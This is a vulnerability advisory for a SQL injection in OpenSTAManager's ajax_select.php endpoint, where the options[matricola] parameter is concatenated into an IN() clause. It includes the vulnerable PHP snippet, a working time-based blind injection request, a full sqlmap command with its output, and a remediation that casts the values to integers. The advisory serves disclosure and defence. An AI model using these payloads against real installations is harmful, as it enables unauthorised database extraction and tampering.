CVE-2025-69214
OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)
Description
## Summary A SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter. ## Proof of Concept ### Vulnerable Code **File:** `modules/impianti/ajax/select.php:122-124` ```php case 'componenti': $impianti = $superselect['matricola']; if (!empty($impianti)) { $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')'; } ``` ### Data Flow 1. **Source:** `$_GET['options']['matricola']` → `$superselect['matricola']` 2. **Vulnerable:** User input concatenated directly into `IN()` clause without sanitization 3. **Sink:** Query executed via AJAX framework ### Exploit **Manual PoC (Time-based Blind SQLi):** ```http GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=<valid-session> ``` <img width="1306" height="581" alt="image" src="https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011" /> **SQLMap Exploitation:** ```bash sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \ --cookie="PHPSESSID=<session>" \ --dbms=MySQL \ --technique=T \ --level=3 \ --risk=3 ``` **SQLMap Output:** ``` [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI back-end DBMS: MySQL >= 5.0.12 ``` <img width="1228" height="801" alt="image" src="https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b" /> ## Impact - **Data Exfiltration:** Time-based blind SQL Injection allows complete database extraction - **Authentication Bypass:** Access to sensitive component and equipment data - **Data Manipulation:** Potential unauthorized modification of records ## Remediation Cast values to integers before using in SQL: **Before:** ```php $impianti = $superselect['matricola']; if (!empty($impianti)) { $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')'; } ``` **After:** ```php $impianti = $superselect['matricola']; if (!empty($impianti)) { $ids = array_map('intval', explode(',', $impianti)); $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')'; } ``` ## Credit Discovered by: Łukasz Rybak
How to fix CVE-2025-69214
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.